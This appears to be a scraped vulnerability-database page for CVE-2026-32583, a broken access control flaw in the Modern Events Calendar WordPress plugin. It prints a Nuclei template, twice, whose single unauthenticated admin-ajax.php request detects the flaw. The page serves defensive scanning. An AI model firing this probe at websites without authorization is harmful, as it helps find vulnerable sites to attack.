Webnus Inc. Modern Events Calendar - Broken Access Control

CVE-2026-32583

Verified

Description

Webnus Inc. Modern Events Calendar <= 7.29.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers bypass authorization, exploit requires no special privileges.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

modern_events_calendar

Published Date

March 19, 2026

Template Author

theamanrawat

CVE-2026-32583.yaml

id: CVE-2026-32583

info:
  name: Webnus Inc. Modern Events Calendar - Broken Access Control
  author: theamanrawat
  severity: medium
  description: |
    Webnus Inc. Modern Events Calendar <= 7.29.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers bypass authorization, exploit requires no special privileges.
  impact: |
    Attackers can bypass authorization and access restricted functionality or data, potentially compromising system integrity.
  remediation: |
    Update to the latest version beyond 7.29.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-32583
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-32583
    epss-score: 0.02841
    epss-percentile: 0.86376
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: webnus
    product: modern_events_calendar
    framework: wordpress
  tags: cve2026,cve,wordpress,wp-plugin,wp,mec,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=mec_speaker_adding

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "mec_fes_speakers"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100826a173f78ee9e66d77ea9cc03d1cdc23af6e1f07e9e89ae7fefcda15e60dc9d0221008872ebbf766f016aa8db34d5f3a11491a14cfbd8798567811ec0a2e8e116fc8b:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CVE ID:

cve-2026-32583

CWE ID:

cwe-862

References

https://nvd.nist.gov/vuln/detail/CVE-2026-32583

Remediation Steps

Update to the latest version beyond 7.29.0.

id: CVE-2026-32583

info:
  name: Webnus Inc. Modern Events Calendar - Broken Access Control
  author: theamanrawat
  severity: medium
  description: |
    Webnus Inc. Modern Events Calendar <= 7.29.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers bypass authorization, exploit requires no special privileges.
  impact: |
    Attackers can bypass authorization and access restricted functionality or data, potentially compromising system integrity.
  remediation: |
    Update to the latest version beyond 7.29.0.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-32583
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-32583
    epss-score: 0.02841
    epss-percentile: 0.86376
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    vendor: webnus
    product: modern_events_calendar
    framework: wordpress
  tags: cve2026,cve,wordpress,wp-plugin,wp,mec,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=mec_speaker_adding

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "mec_fes_speakers"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100826a173f78ee9e66d77ea9cc03d1cdc23af6e1f07e9e89ae7fefcda15e60dc9d0221008872ebbf766f016aa8db34d5f3a11491a14cfbd8798567811ec0a2e8e116fc8b:922c64590222798bb761d5b6d8e72950

Webnus Inc. Modern Events Calendar - Broken Access Control

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Webnus Inc. Modern Events Calendar - Broken Access Control

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps